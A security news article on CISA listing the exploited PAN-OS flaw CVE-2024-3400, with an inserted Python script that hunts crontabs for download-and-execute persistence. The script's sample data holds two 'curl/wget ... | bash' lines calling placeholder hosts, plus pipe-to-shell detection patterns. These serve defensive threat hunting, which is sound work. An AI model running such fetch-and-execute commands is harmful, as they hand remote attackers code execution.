CISA Adds Critical Palo Alto Networks PAN-OS Flaw to Known Exploited Vulnerabilities Catalog

April 15, 2024

The Cybersecurity and Infrastructure Security Agency (CISA) has added the critical command injection flaw in Palo Alto Networks PAN-OS software, tracked as CVE-2024-3400, to its Known Exploited Vulnerabilities catalog. The vulnerability, which carries the maximum CVSS score of 10.0, permits an unauthorized attacker to run arbitrary code with root privileges on affected firewalls. The affected firewalls are those running PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 that are configured with a GlobalProtect gateway or GlobalProtect portal (or both) and have device telemetry enabled.

Palo Alto Networks and Unit 42 have been investigating the CVE-2024-3400 PAN-OS flaw and found that an unknown threat actor has been exploiting it since March 26, 2024. The researchers are tracking this cluster of activity under the name Operation MidnightEclipse. “Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor,” reads the report. “We also assess that additional threat actors may attempt exploitation in the future.”

Upon successful exploitation, the threat actor was seen creating a cron job that ran every minute to fetch commands hosted on an external server, which were then executed via bash. The researchers were unable to retrieve the commands the attackers executed, but they suspect the threat actor tried to deploy a second, Python-based backdoor on the vulnerable devices. This second Python backdoor has been named UPSTYLE by cybersecurity firm Volexity.
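The persistence mechanism described above (an every-minute cron entry that fetches remote content and hands it to bash) is a pattern defenders can hunt for in crontab dumps. The following is an added detection example written for this page; it is not code from the Unit 42 or Volexity reports, and the crontab lines, hostnames and paths it scans are constructed placeholders, not indicators from the incident.

```python
import re

# Constructed sample crontab (not from the original report). Hosts under
# ".invalid" are placeholders, not real indicators of compromise.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * /usr/bin/wget -qO- http://placeholder.invalid/patch | /bin/bash
*/5 * * * * /usr/bin/curl -s https://example.invalid/status >> /var/log/status.log
* * * * * curl -s http://placeholder.invalid/t | bash
30 6 * * 1 /usr/local/bin/backup.sh
"""

# Five schedule fields followed by the command.
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
REMOTE_URL = re.compile(r"https?://\S+")
# A pipe straight into sh or bash, with or without an absolute path.
PIPE_TO_SHELL = re.compile(r"\|\s*(/bin/|/usr/bin/)?(ba)?sh\b")


def parse_crontab(text):
    """Return a list of {line, schedule, command} dicts, skipping comments."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        match = CRON_LINE.match(stripped)
        if not match:
            continue
        minute, hour, dom, mon, dow, command = match.groups()
        entries.append({
            "line": lineno,
            "schedule": (minute, hour, dom, mon, dow),
            "command": command,
        })
    return entries


def runs_every_minute(schedule):
    """True when all five schedule fields are bare wildcards."""
    return all(field == "*" for field in schedule)


def classify(entry):
    """List the suspicious traits of one cron entry (empty list if benign)."""
    cmd = entry["command"]
    reasons = []
    if runs_every_minute(entry["schedule"]):
        reasons.append("every-minute schedule")
    if FETCH_TOOL.search(cmd) and REMOTE_URL.search(cmd):
        reasons.append("fetches remote content")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipes fetched content to a shell")
    return reasons


def find_suspicious(text):
    """Flag entries that fetch remote content AND pipe it into a shell.

    The schedule is reported as context but is not required for a hit,
    so a slower-cadence downloader is still caught.
    """
    findings = []
    for entry in parse_crontab(text):
        reasons = classify(entry)
        if ("fetches remote content" in reasons
                and "pipes fetched content to a shell" in reasons):
            findings.append((entry["line"], reasons))
    return findings


if __name__ == "__main__":
    for lineno, reasons in find_suspicious(SAMPLE_CRONTAB):
        print(f"line {lineno}: {', '.join(reasons)}")
```

The check deliberately requires both the remote fetch and the pipe into a shell, so the legitimate status poller on line 4 of the sample (curl output appended to a log file) is not flagged, while the two download-and-execute entries are. In a real hunt, run it over `/etc/crontab`, `/etc/cron.d/*` and each user's crontab, and treat any hit on a firewall appliance as an incident trigger rather than a tuning exercise.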

The threat actor, tracked as UTA0218 by Volexity, remotely exploited the firewall device to establish a reverse shell and install additional tools. Its main goal was to extract configuration data from the devices and then use that access as a foothold to move laterally within the targeted organizations. “During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. Details on this backdoor are included further on in this report,” reads the report published by Volexity.

Under Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies are required to remediate the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts also advise private organizations to review the catalog and address the listed vulnerabilities in their own infrastructure. CISA has set a deadline of April 19, 2024, for federal agencies to fix this vulnerability.
